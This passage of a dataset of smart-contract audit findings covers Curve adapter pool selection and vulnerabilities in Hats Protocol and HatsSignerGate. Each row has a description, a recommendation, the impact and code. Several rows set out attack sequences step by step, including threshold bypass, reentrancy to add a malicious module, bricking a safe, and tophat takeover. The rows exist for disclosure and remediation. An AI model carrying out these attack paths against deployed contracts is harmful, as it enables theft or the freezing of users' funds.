When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n """"""\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.","If multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\n","The first pool returned by Curve Registry might not be the most optimal pool to trade with. 
The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.","```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n" +Signers can bypass checks and change threshold within a transaction,high,"The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. 
The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. 
However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.","Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.","Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n +HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount,high,"The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. 
So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n","The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. 
Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n","As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.","```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n" +Signers can brick safe by adding unlimited additional signers while avoiding checks,high,"There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over 
the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. 
The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.",There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.,"Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n +"Other module can add owners to safe that push us above maxSigners, bricking safe",high,"If another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. 
In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to ""activate"" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. 
If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.","If `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.",The safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.,```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n +"If another module adds a module, the safe will be bricked",high,"If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the ""before"" check uses `enabledModuleCount` and the ""after"" check uses `enabledModuleCount + 1`. 
The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the ""before"" check would clip off the final modules, and the ""after"" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the ""before"" and ""after"" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.","The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.","The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.","```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +Signers can bypass checks to add new modules to a safe by abusing reentrancy,high,"The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. 
However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. 
It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass","Use a more typical reentrancy guard format, such as checking to ensure 
`_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.",Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.,"```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +"Unlinked tophat retains linkedTreeRequests, can be rugged",high,"When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to ""takeover"" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a ""request"" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if 
(_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission","In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n","Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because 
settings from a previous admin remain through unlinking.","```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n" +Owners can be swapped even though they still wear their signer hats,medium,"`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. 
This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n","Issue Owners can be swapped even though they still wear their signer hats\\nPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.",bypass restrictions and perform action that should be disallowed.,"```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n" +Unbound recursive function call can use unlimited gas and break hats operation,medium,"some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. 
functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer 
of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.",code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. 
(keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold),it won't be possible to perform actions for those hats and funds can be lost because of it.,"```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if 
(isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n" +The Hats contract needs to override the ERC1155.balanceOfBatch function,medium,"The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, ""LENGTH_MISMATCH"");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n",Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.,"This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects","```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 
